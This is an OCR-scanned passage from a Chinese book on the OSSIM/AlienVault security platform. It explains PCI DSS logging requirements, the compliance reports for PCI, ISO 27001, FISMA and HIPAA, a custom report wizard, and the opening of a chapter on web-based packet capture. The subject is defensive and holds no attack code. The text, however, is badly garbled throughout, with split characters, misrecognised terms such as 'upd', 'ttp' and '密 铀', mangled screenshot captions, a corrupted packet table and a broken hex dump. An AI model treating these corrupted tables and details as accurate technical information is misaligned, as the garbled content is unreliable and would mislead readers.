权 ， 避 免 非 法 变更 的 情况 。 那 么 就 需 使 用 防火 墙 日 志 来 记录 配置 变更 。 

€ Requirement 2 — Do not use vendor-supplied defaults for system passwords and other 
security parameters ， 这 里 讨论 密码 管理 的 实践 和 安全 加 固 。 比 如 不 启动 没有 必要 的 
服务 ， 日 志 条 目 可 以 告诉 我 们 ， 在 何 时 启动 了 事先 关闭 的 服务 。 


(2) 第 二 类 : 保护 持 卡 人 数据 


€ Requirement 3 — Protect stored cardholder data， 需 求 3 要 更 进一步 处 理 数据 加 密 ， 例 如 
在 R.3.6 小 节 ， 要 求 验证 这 些 活动 是 否 真正 进行 的 日 志 ， 在 大 部 分 加 密 系 统 记录 密 铀 
生成 分 发 的 日 志 ， 需 要 记录 。 

€ Requirement 4 — Encrypt transmission of cardholder data across open, public networks. [7] 
样 还 是 处 理 加 密 


GO 第 三 类 : 确保 脆弱 性 管理 体系 的 维护 
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(5 


(6 


Ma 


Requirement 5 — Use and regularly update anti-virus software， 这 是 针对 病毒 的 防御 ， 在 
R.5.2 小 节 中 记录 了 要 确保 所 有 防 病 毒 工 具 是 最 新 且 处 于 活动 状态 ,而 且 要 能 生成 审 
计 日 志 。 如 果 公 司 的 防 病毒 系统 更 新 失效 ,意味 着 其 网 络 可 能 遭受 恶意 软件 的 攻击 。 
Requirement 6 — Develop and maintain secure systems and applications， 这 里 要 求 组 织 
发 和 维护 安全 的 系统 和 应 用 程序 。 

第 四 类 : 实施 强 访问 控制 

Requirement 7 — Restrict access to cardholder data by business need-to-know， 这 里 根据 
业务 按 需 了 解 的 原则 限制 对 持 卡 人 数据 的 访问 ， 需 要 日 志 来 验证 谁 能 够 访问 所 指 的 
数据 。 

Requirement 8 — Assign a unique ID to each person with computer access， 这 一 需求 最 详 
细 ， 就 是 为 每 个 具有 计算 机 访问 权 的 人 分 配 唯一 的 ID， 而 且 具 有 一 定 权限 。 人 们 必 
须 控制 用 户 ID， 在 R8.5.9 中 规定 了 必须 在 90 天 内 至 少 修改 一 次 用 户 密码 ， 也 可 以 
通过 审核 来 自 服务 器 的 日 志 来 验证 。 

Requirement 9 - Restrict physical access to cardholder data， 限 制 物 理 访问 持 卡 人 数据 ， 
将 对 系统 组 件 和 持 卡 人 数据 的 访问 限制 为 只 有 工作 需要 访问 这 些 数据 的 人 。 为 每 位 
拥有 计算 机 访问 权限 的 用 户 分 配 唯一 的 ID。 限制 对 持 卡 人 数据 的 物理 访问 。 在 R.9.4 
中 规定 ， 使 用 访问 者 日 志 维 护 访问 者 活动 ， 并 保留 这 些 日 志 至 少 3 个 月 ， 除 非法 律 
有 其 他 限制 。 


第 五 类 : 经 常 性 地 监控 和 测试 网 络 


Requirement 10 - Track and monitor all access to network resources and cardholder data 
跟踪 并 监控 所 有 对 网 络 资源 的 访问 和 持 卡 人 的 数据 。 

Requirement 11 - Regularly test security systems and processes 定期 测试 安全 系统 和 过 
程 ， 说 明 扫描 范围 内 系统 漏洞 测试 的 必要 性 ， 在 R.11.4 中 要 求 使 用 IDS/IPS: 使 用 网 
络 入 侵 检测 系统 和 入 侵 防御 系统 监控 所 有 网 络 流量 ， 并 向 有 关 人 员 发 出 可 疑 入 侵 的 
报告 ， 确 保 入 侵 检测 引擎 为 最 新 。 

第 六 类 : 确保 信息 安全 策略 的 维护 

Requirement 12 — Maintain a policy that addresses information security， 这 是 最 高 要 求 ， 
它 涵盖 了 安全 策略 、 标 准 和 日 常 运营 的 规程 。 尽 量 按照 这 个 要 求 来 对 网 络 系统 进行 
管理 ， 通 过 精心 收集 、 分 析 数 据 ， 才 可 能 满足 PCI DSS 的 众多 要 求 。 接 下 来 ， 我 们 
还 需要 了 解 OSSIM 的 多 种 报表 合 规格 式 。 在 合 规 展示 方面 ， 除 了 通过 报表 的 方式 ， 
还 可 以 在 仪表 盘 中 对 这 十 二 项 要 求实 时 更 新 数据 ， 如 图 9-135 Pp. 
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9-135 ”仪表 盘 显示 的 合 规 检测 结果 


9.13.5 “报表 类 型 


1. OSSIM USM 报表 

在 开源 版 OSSIM 中 输出 报表 有 限 ， 主 要 以 PDF 形式 输出 ， 而 OSSIM 企业 版 提供 比 开 源 
版 更 丰富 的 报表 , 包含 更 多 细节 , 能 在 线 预览 , 也 能 以 各 种 文件 格式 下 载 。 表 9-6 总 结 了 OSSIM 
USM 中 输出 报表 种 类 。 


表 9-6 USM 报表 

编号 报表 名 称 细节 时 间 
1 Alarm 报告 Top Attacked Host 30 天 

Top Destination Ports 

Top Alarm 

Top Alarms by Risk 
2 资产 报告 资产 摘要 、 报 警 30 天 

漏洞 、 安 全 事件 、 裸 日 志 等 
3 可 用 性 报告 可 用 性 趋势 报告 、 可 用 性 状态 、 事 件 、 性 能 等 报表 30 天 
4 商业 和 法 规 遵从 | 风险 、PCIDSS 2.0、3.0 报 表 30 天 
5 数据 库 活动 数据 库 安全 事件 、 日 志 报表 30 天 
6 数据 源 事件 由 数据 源 分 类 的 事件 报表 30 天 
7 数据 产生 类 型 根据 事件 产生 类 型 分 类 的 统计 表 30 天 
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( 续 表 ) 
编号 报表 名 称 细 节 时 间 
8 FISMA 报表 用 户 认证 ， 活 动 访问 等 安全 事件 ， 攻 击 日 志 分 类 的 日 志 报 | 30 X 
fi PCI 无 线 报告 以 及 Tickets 状态 
9 地 理 位 置 报表 按 P 出 现 的 国家 分 类 报告 30 天 
10 HIPAA 报表 Alarm 攻击 分 类 的 Top 10, 裸 日 事件 信息 ,安全 事件 Top10 | 30 天 
等 报表 
11 Honeypot 活动 | 数据 源 分 类 的 事件 ， 各 类 安全 事件 ， 根 据 数据 源 分 类 的 不 | 30 天 
报表 同 特征 码 
12 ISO 27001 技术 | ISO27001-A.10.4.1 30 天 
报告 ISO 27001-A.10.6.1 
ISO27001-A 10.10.1 
13 Malware 告警 Alarm Top 攻击 主机 排名 及 列表 30 天 
14 PCI2.0 报告 全 面 (包括 主机 、 防 火 墙 、 认 证 、 无 线 、 加 密 传输 等 方面 ) | 30 天 
测评 报告 
15 PCI3.0 报告 比 PCI 2.0 更 详细 的 报告 30 天 
16 策略 配置 和 变更 | 系统 安全 配置 、 认 证 配置 策略 变更 报告 30 天 
报告 
17 日 志 访 问 报告 主机 攻击 事件 目标 端口 访问 事件 应 用 访问 事件 IPS/IDS | 30 天 
事件 、 邮 件 服务 器 事件 、 路 由 器 服务 器 、VPN 事件 
18 Raw Log Alarm、Alert、 异 常 行为 检测 、 病 毒 、 应 用 、 防 火 墙 、 认 证 、 | 30 天 
DHCP、 可 用 性 、 数 据 保护 、 蜜 铅 、IDS/IPS、Inventory、 
邮件 安全 、 邮 件 服务 器 、Malware、 管 理 平台 、 网 络 发 现 、 
Web 服务 器 、 渗 透 、 无 线 及 漏洞 扫描 等 日 志 报 告 
19 安全 事件 安全 访问 事件 、 账 户 改变 、Alarm、Alert 等 同 Raw Log 的 | 30 天 
报表 分 类 
20 SOX 报告 Tickets、Alarms 及 安全 事件 报告 30 天 
21 用 户 活动 用 户 活动 报告 30 天 
22 漏洞 报告 JR E, m. ch. d 30 X 
2. OSSIM 报表 


开源 的 OSSIM 报表 种 类 和 数量 相对 简单 ， 可 提供 Alarms 报告 、 资 产 报告 、 可 用 性 报告 、 
B&C 商业 合 规 PCI 报告 、 度 量 报告 、 风 险 漏洞 数据 库 报 告 、Tickets 状态 报告 、 用 户 活动 报告 
以 及 漏洞 报告 等 方面 ， 输 出 PDF 形式 如 图 9-136 所 示 。 
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Business & Compliance ISO PCI Report 


150 PCIREport-| ALIEN VAULT OSSIM 


Business & Compliance ISO PCI Report - 5027002 Potential impact 


1S0 PCI Report- 
iis 


9.13.6 日 志 合 规 检测 

企业 网 中 存在 大 量 不 同 种 类 的 日 志 , 而 且 数 据 量 巨 大 , 使 得 管理 员 需 要 花费 更 多 的 精力 去 
收集 和 分 析 日 志 。 目前 国际 上 对 日 志 的 管理 都 有 这 一 套 严 格 的 标准 和 完善 的 依从 性 技术 , 法 律 
法 规 (PCIDSS、FISMA、HIPAA) 以 及 最 佳 实践 框架 (如 ISO 27001 等 )， 这 些 规定 都 对 日 志 
管理 提出 了 强制 性 的 要 求 ， 希 望 读 者 在 收集 日 志 的 同时 对 这 些 标准 有 所 了 解 。 

ISO 27001 环境 下 记录 的 日 志 内 容 为 A.5.1 (Information Security Policy ) ~A.15.3 

(Information Systems Audit Considerations), 所 要 求 的 详细 内 容 被 记录 在 “ISO/IEC 27001:2005 

信息 技术 -安全 技术 -信息 安全 管理 系统 -需求 ”中 ， 如 果 所 在 的 组 织 正在 推行 ISO 27001， 可 到 
http://www.27000.org 查询 相关 信息 。 在 OSSIM 中 对 18027001 也 进行 了 严格 的 定义 ， 大 家 可 
以 在 Configuration— Threat Intelligence 一 Compliance Mapping 菜单 下 找到 ， 默 认 系统 为 英文 ， 
为 了 方便 理解 汉化 内 容 大 家 可 参考 http://chenguang.blog.51cto.com/350944/1671973 这 篇 博文 。 
另外 ， 对 于 报表 的 检测 模块 在 OSSIM USM 中 还 能 够 自 定义 输出 内 容 ， 如 图 9-137 所 示 ， 图 
中 左 侧 为 选择 好 的 报表 模块 ， 也 可 以 将 右 侧 待 选 模 块 加 入 其 中 。 
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原 安全 运 维 平台 


DASHBOARDS 
USM REPORTS. 


overview — MODULEs 


模块 选 定之 后 ， 接 


OSSIM 最 佳 实 


f RS. 
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图 9-137 自 定义 报表 
着 确定 对 那些 资产 进行 审计 ， 如 图 9-138 所 示 。 


USM REPORTS 
OVERVIEW MODULES LAYOUTS SCHEDULER 
J WIZARD: STEP 2 OF 3: ASSET SELECTION 
Search: [ 
Selected: Host-192-168-91-140 (192.168.91.140) 
e â Visibility 
= d My Company 
= «» Assets from My Company 
= (4 Assets 


待 目 标 选 定之 后 ， 
如 图 9-139 所 示 。 
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* d 10.32.22 Q hosts 
= (S 192.168.91 (8 hosts) 
192.168.91.1 (Host-192-168-91-1) 
192.168.91.2 (Host-192-168-91-2) 
192.168.91.140 (Host-192-168-91-140) 
192.168.91.150 (Host-192-168-91-150) 
192.168.91.224 (Host-192-168-91-224) 
192.168.91.226 (VirtallllinOneSx1G8) 
192.168.91.226 (Host-192-168-91-226) 
192.168.91.254 (Host-192-168-91-254) 
= dp Asset Groups 
* ig Networks 
* si Network Groups 
© gf Other Users 
dj ANY 


图 9-138 选 定 审核 资产 
接 下 来 指定 报表 的 Logo、 主 题 内 容 、 地 址 、 电 话 、 


dim o i s o i i 


生成 日 期 等 内 容 ， 
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MODULES LAYOUTS SCHEDULER 


J WIZARD: STEP 3 OF 3: CUSTOM PARAMETERS FOR SELECTED REPORT MODULES 


TITLE PAGE 

Logo E 

D:AUsers dell Desktoplnoc.jpg mE 

" Only gif .png and jpg files 
Main Title: ISO 27001 Technical Report. 
LT. Security: 
Address 
Tel: [010-12345678 
Date: [EDATE 
* Add a custom comment 

ISO 27001 
A.10.4.1 CONTROLS AGAINST MALICIOUS CODE ADO AS A NEW REPORT MODULE 


as 


Number of Events: T 
一 


Source Database: [SEM v 
Group by Ges — Iv] 


* Adda custom comment 


图 9-139 生成 报表 格式 
一 切 就 绪 之 后 ， 单 击 “ 更 新 ”和 “和 运行” 按钮， 系统 立即 快速 生成 定制 好 的 报表 。 默 认 检 


测 时 间 为 30 天， 系统 最 长 可 以 产生 1 年 的 报表 ， 如 果 需 要 调整 时 间 ， 则 需要 选择 自 定义 运行 
报表 ， 如 图 9-140 所 示 。 这 里 可 以 选择 的 时 间 范 围 从 当天 到 全 年 都 可 以 自由 选择 ， 按 运行 按钮 


即 可 输出 报表 ， 如 图 9-141 所 示 。 


USM REPORTS o 
OVERVIEW MODULES LAYOUTS SCHEDULER 
ZEDA 
ISO 27001 TECHNICAL REPORT 
creato AVAILABLE FOR DATE RANCE asses Acrons 
aamin A users ER EEE 
Last 30 days Host Host-192-168-91-140 SÌ Download PDF = {8 Sena oy e-n 
6 


K 9-140 KENET 
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Current week 


CUSTOM RUN Current month 

Last 7 days 
Last 15 days 

parerance IE Dee 
Last 60 days 
Last 90 days 

E Last 365 days 
ASSETS 
Search: [ i| 
Selected: Host: Host-192-168-91-140 
gj ANY 
= gj Visibility 


= My Company 
= <> Assets from My Company 
$5 Assets 
= gj Asset Groups 
* gg Networks 
* ss Network Groups 


图 9-141 选择 时 间 范 围 


913.7 ”报表 合 规 性 

为 了 解 合 规 性 ,下 面 我 们 先 来 了 解 几 种 流行 的 法 规 ， 查 看 它们 在 日 志 记录 和 分 析 管 理 中 扮 
演 的 角色 。 这 些 报 表 输 出 位 于 Reports 菜单 下 。 在 OSSIM 系统 中 合 规 性 类 别 分 为 以 下 4 种 类 
型 。 

1. PCI 一 一 支付 卡 行业 数据 安全 标准 

OSSIM 系统 中 ， 通 过 以 下 路 径 访 问 PCI DSS 的 内 容 ，Web UI 下 Configuration 一 Threat 
Intelligence 一 Compliance Mapping， 如 图 9-142 所 示 。 


X 


CONFIGURATION 


REPORTS 


DASHBOARDS ANALYSIS ENVIRONMENT 

THREAT INTELLIGENCE o 
POLICY — ACTIONS pors 。 Dinrcnves | COMPLANCEMAPPING | CROSSCORRELA'ICH DATASOURCE TAXONOMY  KNOWLEOGE BASE 

15027000 | PCIDsS20 | pclpss30 EIS 


policy 


* AS interms 


* AG Internal 


图 9-142 AHER 


它 可 使 企业 满足 PCI-DSS 支付 卡 行业 数据 安全 标准 〉 中 第 10 条 款 的 要 求 。 该 条 款 要 求 
支付 服务 提供 商 必须 记录 系统 日 志 ， 以 便 追 踪 并 报告 对 其 网 络 资源 和 持 卡 人 数据 的 所 有 访问 。 
网 络 环境 中 的 日 志 , 便于 出 现 问 题 时 用 于 计算 机 取证 分 析 。 如 果 没 有 系统 活动 日 志 ， 则 很 
难 找到 故障 原因 ,OSSIM 并 不 是 简单 将 ISO 27001、PCIDSS 2.0 等 规章 进行 罗列 , 它 会 在 Report 


菜单 中 将 合 规 要 求 以 报表 形式 输出 。 表 9-7 中 展示 了 PCI 报表 输出 表 的 动作 及 描述 。 
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表 9-7 PCI 报 表 输 出 主要 内 容 
组 成 表 
PCIDSS 的 | 系统 级 别 对 象 的 创建 和 删除 ， 鉴 | 批准 访问 一 个 已 经 存在 的 对 象 类 型 来 访问 一 个 
10.2.7 条 款 “| 别 出 某 特定 对 象 文件、 目录 等 )| 对 象 
何 时 被 访问 ， 访 问 类 型 (如 : 读 、| 批 准 访问 一 个 已 经 存在 的 对 象 类 型 来 创建 一 个 
写 、 删 除 ) 以 及 访问 是 成 功 或 失 | 对 象 。 
败 ， 以 及 谁 执行 了 访问 动作 等 ”| 批准 访问 一 个 已 经 存在 的 对 象 类 型 来 修改 一 个 
对 象 。 
一 个 要 打开 对 象 并 删除 对 象 的 尝试 。 
一 个 保护 的 对 象 被 删除 
PCLIDSS 的 | 清晰 地 指明 ， 为 了 防止 滥用 ， 所 | 用 户 成 功 登 录 到 计算 机 。 
10.2.1 和 | 有 个 体 用 户 对 系统 的 访问 都 要 被 | 成 功 访问 了 系统 , 这 个 事件 指明 一 个 远程 用 户 已 
10.23 条 款 “| 记录 和 监视 。 其 目的 不 只 是 为 了 | 经 成 功 从 网 络 中 连接 到 服务 器 上 的 本 地 资源 为 
抓 住 黑客 ， 而 是 要 记录 下 所 有 对 | 网 络 用 户 生成 了 一 个 令 牌 。 
持 卡 人 数据 的 访问 。 大 多 数 情况 | 用 户 退 出 一 个 计算 机 。 
下 ， 对 访问 进行 记录 就 足以 制止 | 未 知 用 户 名 或 已 知 用 户 密码 错误 的 登录 尝试 。 
恶意 活动 ， 就 很 像 停 车 场 中 的 摄 | 在 允许 的 时 间 之 外 的 登录 尝试 。 
像 头 。 对 系统 的 非法 逻辑 访问 企 | 一 个 使 用 了 停 用 /过 期 账户 的 登录 尝试 。 
图 也 将 被 记录 和 监视 ， 从 而 可 以 | 账户 在 登录 尝试 的 时 候 被 锁 住 。 这 个 事件 指明 一 
有 效 防 止 数 据 的 乱用 。 因 此 ， 在 | 个 不 成 功 的 口令 攻击 导致 了 账户 被 锁 住 。 
这 类 报表 中 ， 必 须 提 供用 户 名 、| 一 个 用 户 已 经 重新 连接 到 断 开 的 终端 服务 会 
日 期 和 时 间 等 信息 话 . 这 个 日 志 指明 一 个 以 前 的 终端 服务 会 话 已 经 
连接 。 
一 个 用 户 没 有 退出 就 断 开 了 终端 服务 会 话 。 这 个 
事件 发 生 于 一 个 用 户 通过 网 络 连 接 到 终端 服务 
会 话 的 时 候 。 出 现 于 终端 服务 器 
PCI-DSS 的 | 所 有 审计 记录 的 访问 ， 让 组 织 通 | 一 个 用 户 权利 被 分 配 / 移 除 。 
10.23 条 款 “| 过 追踪 事件 日 志 ， 了 解 任何 安全 | 另外 一 个 域 的 委托 关系 被 创建 / 移 除 。 
审计 策略 的 更 改 ， 从 而 更 好 地 实 | 一 个 审计 策略 被 更 改 

现 内 部 控制 
PCLDSS 的 | 审核 具有 root 权限 或 者 管理 员 权 | 所 有 特权 用 户 安全 相关 的 动作 
10.1 和 10.2.2| 限 的 用 户 的 所 有 动作 。 如 : 通过 

建立 链接 将 对 系统 部 件 的 所 有 访 


系统 事件 |PCI-DSS 的 | 审计 日 志 的 初始 化 ， 要 求 定期 复 | 计算 机 的 重启 是 否 为 计划 中 的 重启 , 获取 一 个 计 


计 日 志 ) 一 个 可 靠 的 登录 进程 已 经 注册 到 本 地 安全 认 
证 。 修 改 或 清除 安全 日 志 

在 OSSIM 中 列 出 的 PCI DSS2.0 的 12 类 需求 (汉化 内 容 大 家 可 访问 

http://chenguang.blog.51cto.com/350944/1671930 这 篇 博文 )， 这 些 需求 覆盖 了 数据 访问 、 特 权 用 

PEE 日 志 访 问 和 初始 化 、 失 败 和 无 效 日 志 的 访问 、 身份 认 证 及 授权 策略 以 及 对 可 疑 活动 的 
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监视 等 。 目 前 PCI 安全 标准 委员 会 已 发 布 支付 卡 行业 数据 安全 标准 3.0 版 (PCI DSS 3.0), 主 
要 增加 了 对 PCI DSS 范围 内 的 系统 组 件 进行 库存 管理 。 通 过 学 习 OSSIM 系统 中 ISO 27001 和 
PCI DSS 相关 内 容 ， 不 仅 可 改变 用 户 不 良 安全 习惯 ， 而 且 增强 了 对 落实 遵从 管理 的 执行 力 。 
2. FISMA 一 一 联邦 信息 安全 管理 
该 法 案 旨 在 规定 联邦 信息 和 信息 系统 的 最 小 安全 控制 要 求 。 它 指定 了 联邦 信息 和 信息 系统 
在 17 个 安全 相关 的 领域 的 最 小 安全 要 求 。 联 邦 部 门 必须 满足 这 里 定义 的 最 小 安全 要 求 ， 并 贯 
穿 依照 NIST 特别 发 布 800-53 的 安全 控制 ， 如 图 9-143 所 示 。 


ALIEN VAULT 


| 
25 Jun 27 Jun 29 Jun 01 Jul 03 Jul 05 Jul 07 Jul 09 Jul 11 Jul 13 Jul 15 Jul 17 Jul 19 Jul 21 Jul 23 Jul 25 Jul 


CIIM ETIN GNE NNNM NN NN UNE NN 


ossec: Login session opened 2014-07-18 21:07:40 0000 alienvault Ce 3 
ossec: Successful sudo to ROOT executed 2014-07-18 21:07:40 alienvault. 0000 = 
ossec: Login session opened. 2014-07-18 21:07:38 0.0.0.0 alienvault CC 
ossec: Successful sudo to ROOT executed 2014-07-18 21:07:38 alienvault 0.0.0.0 Ce 
ossec: Login session opened. 2014-07-18 21:04:11 Ell 202.106.199 38 192.168.11.218. EE 
ossec: Login session closed. 2014-07-06 10:53:52 Ill 202 106.199.38 alienvault. Eze—I 
ossec: Login session opened. 2014-07-06 10:53:52 Ill 202.106.199.38 alienvault. t-e 3 


图 9-143 ”FISMA 中 的 验证 报表 
FISMA， 本 身 没有 规定 任何 日 志 记 录 或 日 志 管理 ， 它 只 是 停留 在 策略 和 规划 层级 ， 例 如 
AC 指 的 是 访问 控制 ， 但 这 里 只 有 文档 却 没有 行动 ， 没 有 告诉 如 何 去 做 。 
AU 控制 ， 代 表 审 计 和 可 审核 性 策略 及 规程 ， 这 里 最 重要 的 是 要 有 日 志 记 录 策 略 ， 如 果 没 
有 作为 基础 的 操作 规范 就 没有 任何 意义 , 要 定义 所 有 记录 的 事件 , 并 在 每 个 事件 所 生成 的 细节 
上 做 记录 ， 有 一 点 可 以 肯定 ,这些 规定 、 文 档 并 不 能 阻止 黑客 ,而 且 当 日 志 数 据 丢 失 时 ,那么 
将 无 助 于 对 攻击 事件 的 调查 。 


3. HIPAA -医疗 电子 交换 
HIPAA 法 案 要 求 对 所 有 日 志 (包括 操作 系统 和 应 用 程序 的 日 志 ) 进行 分 析 。HIPPA 和 PCI 
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DSS 不 同 ，HIPPA 本 身 没 有 涉及 安全 控制 级 别 和 所 采用 的 技术 ， 所 以 这 种 报表 重要 程度 较 低 ， 
输出 效果 如 图 9-144 所 示 。 


HIPAA Report 


ALIEN VAULT 


SIEM events summary. 


CINE E SH | 
100% 


Unknown 1 


100% 


Æ 9-144 HIPAA 输出 报表 


9.1 4 小 结 


学 习 本 章 需要 结合 前 面 S 章 的 内 容 ， 从 Web UI 结构 讲 起 , 逐步 介绍 HIDS 的 安装 以 及 
规则 的 编写 初步 、 深 入 阐述 了 OpenVAS 原理 与 故障 处 置 ， 对 于 本 章 资产 管理 也 是 个 重点 
内 容 ， 从 资产 中 的 代理 安装 到 异常 流量 监控 到 漏洞 扫描 都 有 详细 介绍 ， 尤 其 对 网 络 蠕虫 的 
防范 进行 了 详细 地 讲解 。 本 章 最 后 一 部 分 讲解 了 合 规 管 理 和 统一 报表 管理 ， 对 报表 的 基本 
使 用 做 了 详细 描述 。 
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< 基于 B/ S 架 构 的 激 据 坚 捕 获 分 析 * 


抓 包 是 运 维 的 必 备 技能 ， 很 多 网 络 故 障 需 要 靠 抓 包 来 解决 ， 如 常见 的 ARP 欺骗 和 广播 风 
暴 。 另 外 还 有 一 些 网 线 或 光纤 接触 不 好 的 故障 , 不 抓 包 也 很 难 分 析出 来 , 例如 两 个 公司 之 间 互 
联 ， 网 线 测 试 都 没 问题 ， 但 始终 不 通 。 经 过 抓 包 分 析 表 明 ， 发 现 其 他 单位 的 ping 请 求 都 伴随 
着 ARP 查询 ， 而 不 走路 由 ， vue E 掩 码 设 置 错 误 的 问题 ， 经 仔细 排查 ， 确 实 是 路 由 
器 上 的 掩 码 出 现 失误 。 抓 包工 具有 不 少 ， 但 选择 一 款 适合 你 的 工具 非常 重要 。 

本 章 主 要 为 大 家 介绍 OSSIM Aus LR, CE 
Wireshark 的 另 一 种 表现 形式 ， 这 和 CloudShark Appliance Ccloudshark.org) 的 表现 手法 非常 类 
似 。 从 功能 上 看 ， 这 种 基于 Web 的 抓 包 分 析 工 具 是 Wireshark 的 精简 版 。 它 的 优势 在 于 远程 客 
户 端 ， 通 过 Web 界面 就 可 以 实现 在 服务 器 端 抓 包 ， 还 能 够 抓 到 不 同 传感器 (能 收集 不 同 网 段 
的 信息 ) 所 检测 的 数据 包 异 常 。 在 阅读 本 章 时 , 需要 读者 具备 网 络 嗅 探 与 数据 报 分 析 的 基础 知 
识 ， 具 备 Wireshark 抓 包 经 历 


数据 包 捕获 


过 去 ， 分 析 网 络 故障 常 在 一 个 系统 中 用 tcpdump 抓 包 ， 将 包 保 存 起 来 ， 再 导入 Wireshark 
进行 分 析 。 不 过 现在 使 用 OSSIM Web UI 下 的 Traffic Capture 不 必 这 么 麻烦 ， 操 作 方 法 为 
Environment- Traffic Capture， 界 面 如 图 10-1 所 示 。 如 果 是 在 分 布 式 OSSIM 环境 中 ， 一 定 要 
注意 Sensor 的 选择 ， 以 及 Sensor 上 对 应 的 网 卡 。 


第 10 章 基于 B/S 架构 的 数据 包 捕获 分 析 


CAPTURE OPTIONS 
TiMEOUT (10 $)seconds CAPSIZE EEE 4000 packets RAW FILTER 
SETTINGS 
SENSOR SOURCE DESTINATION 
ED ILES 
192.168.11.107 (alienvault / eth1) 
192.168.11.150 (VirtualUSMAllInOne / eth) 
192.168.11.150 (VirtualUSMAllInOne / eth2) 
= o All Assets = «s All Assets 
= 5 Assets = 看 Assets 
= i 192.168.11 (12 hosts) * i 192.168.11 (12 hosts) 
= gy Asset Groups = gy Asset Groups. 
= 三 Networks = Š Networks 
= DL, Network Groups = a 192.168.11.—/- 


-+ ae IEIEUREPIRECRERORZTIEFATSNIKTZD 
= „i, Network Groups 


IE 
图 10-1 多 传感器 抓 包 设置 


dm 在 设置 (settings) 选项 下 方 ， 源 地 址 和 目标 地 址 均 为 可 选项 。 其 使 用 方法 较 简单 ， 选 择 对 
应 Sensor， 输 入 源 地 址 和 目标 地 址 ， 然 后 单 击 捕捉 按钮 即 可 。 但 应 用 该 工具 之 前 ,操作 人 
员 对 TCP、UDP、IP、ICMP 协议 及 HTTP、DHCP、DNS、FTP 等 常见 应 用 层 协议 需要 
LI 


单 击 捕捉 按钮 之 后 ， 会 显示 如 图 10-2 所 示 界 面 。 


TRAFFIC CAPTURE 
SENSORS STATUS 
SENSOR NAME SENSOR IP TOTAL CAPTURES STATUS 
localhost 正在 收集 抓获 效 据 包 。 192.168 91 228 1 Capturing 
CURRENT CAPTURE 。 EPE Packages 4% 
i Te 94% 


下 载 抓 包 查看 抓 包 
CAPTURE START TIME DURATION (SECONDS) USER ACTION, 
Eni PORES] 
2015-10-10 03:46:12 10 admin 删除 抓 包 | 
图 10-2 ”显示 当前 传感器 抓 包 情况 


另外 ， 在 分 布 式 OSSIM 系统 中 ， 分 析 远 程 某 个 网 段 的 数据 包 ， 由 受 控 网 段 内 的 Sensor Jf 
包 文 件 存储 在 Sensor 端 /var/ossim/traffic/ 目 录 下 ， 命 名 为 netscan_admin_IPpcap， 前 提 是 这 人 台 
Sensor 的 /var 目录 剩余 空间 大 于 SGB。 可 以 对 所 抓 包 列表 进行 删除 ， 下 载 和 显示 载荷 操作 ， 如 
图 10-2 所 示 。 


10.1.1 数据 包 捕 获 设 定 
在 设 定数 据 包 时 ， 可 以 在 Sensor 下 拉 菜 单 中 选择 需要 监控 网 段 的 传感器 ， 选 定 网 络 接口 ， 
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以 及 捕 包 时 间 (10~180 秒 )， 选 择 源 地 址 、 目 标 地 址 ， 设 定 过 滤 选 项 (Raw Filter) 以 及 设 定 
每 个 捕获 数据 包 的 大 小 等 几 个 步骤 。 

Raw filter 可 设置 过 滤 协 议 ， 例 如 过 滤 TCP, IP. UDP 等 协议 ， 其 可 选 值 为 ttp、upd、ip、 
icmp、arp、rarp 等 。 如 果 不 填写 ， 则 代表 所 有 协议 。 很 多 过 滤 条 件 需 要 手工 输入 ， 另 外 填写 
在 Raw filter 后 面 的 一 定 是 协议 名 称 的 小 写字 母 。 捕 捉 到 数据 包 以 后 ， 下 面 开始 查看 细节 ， 如 
图 10-3 所 示 。 


Start tine:Mon Jan 5 29:03:19 2015 End time:Mor Jan E 20:38: Fine) [s arces CETEU - r 
Capture durationii sescnás Number of packsts:2512 Pile size:26i. Filter: (ip. sre—192. 168. 11.121 Tamy Maer] | |@e 
"o. Tine Souro Destination Peetecst p Tato 
1 0.900900 192.162.11.121 zem z^ 2i » ds [SUN] ege) 由 or64240 Lene MSS=1460 
5 2172 > 445 [SIN| Seqe) Wine $4240 Lene? NSSeliéo 
a 0.900020 Tc? a RE 
3 0.000065 zm E 3125 » 4E [FW] Seq? Win-FEH4O en-O NSS-1468 
à c.900115 cp € 
5 e. 000121 1er e SYN] Sege) iineó4240 Len 1060 
ï 0.000320 "C x SUN] Seg- Wineé42i0 Le 
? 6.000328 c i SYN] sss-3 Wincéi240 Len-o MES-1460 
: .900332 Tc € SYN) Seq=) Win=64240 Lene MS3=1460 
0.90033 z > 445 [SUN] Sege) Nine64240 Leneü MSS=1460 
D 0.300226 1c a pee 
m 0.000366 i zi 2100 > 445 [SYN] Segue) Wine64240 Lene? 495-1460 


TN] Seg) WineG424: Lena MSSe1460 SACE PERMel 


图 10-3 数据 包 细 节 
上 图 看 到 的 是 基于 Web 抓 包 系统 的 主 窗口 ,外观 和 Wireshark 主 界面 非常 相似 。 最 上 方 显 
示 捕 获 数据 包 的 开始 时 间 、 结 束 时 间 和 持续 时 间 , 在 主 窗口 下 方 有 3 个 可 伸展 的 面板 , 分 别 是 
包 列 表 、 包 细节 和 包 字 节 3 部 分 。 如 果 没 抓 到 包 有 可 能 是 流量 镜像 环节 有 问题 ,也 有 可 能 是 过 
滤 条 件 设置 不 当 所 致 。 


10.1.2 382 x d iE RH 

下 面 介绍 图 10-3 所 示 数 据 包 中 各 栏 作用 如 下 : 

(1) 包 列 表 。 最 上 面 的 面板 显示 了 当前 捕获 文件 中 的 所 有 数据 包 ， 包括 了 数据 包 序号 
(NO.)、 数 据 包 捕获 的 相对 时 间 (Time)、 源 地 址 (Source)、 目 的 地 址 (Destination)、 协 议 
(Protocol)、 数 据 包 长 度 (Length). 以 及 概况 信息 等 。 为 了 便于 观察 ， 对 于 选中 的 包 ， 系 统 会 
用 绿色 高 亮 显示 出 来 。 
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Qo 包 细 节 。 中 间 面 板 显示 了 一 个 数据 包 中 的 内 容 ， 并 且 可 以 通过 展开 或 者 收缩 来 显示 


这 个 数据 包 中 所 捕获 到 的 全 部 信息 。 


GO 包 字 节 。 最 下 面 的 面板 可 能 是 比较 头痛 的 ， 如 图 10-4 所 示 ， 因 为 它 显 示 了 一 个 数据 
包 的 真实 面目 , 用 过 十 六 进 制 编辑 的 读者 就 能 理解 ， 图 中 左边 方 框 内 显示 的 是 偏 移 量 ,中 间 显 
示 的 是 十 六 进 制 ， 右 边 方 框 显 示 的 是 中 间 内 容 的 可 显示 字符 。 


TT IU 
00 54 84 


Te eror UC 
55 00 00 40 01 5e 


IZ TT 36500900 
9b c0 a8 Ob 64 cO abi 


Ob 04 00 00 78 £0 38 25 03 93 52 f1 c6 18 00 00| 


47 4a 08 09 Oa 0b Oc Od Oe 0f 
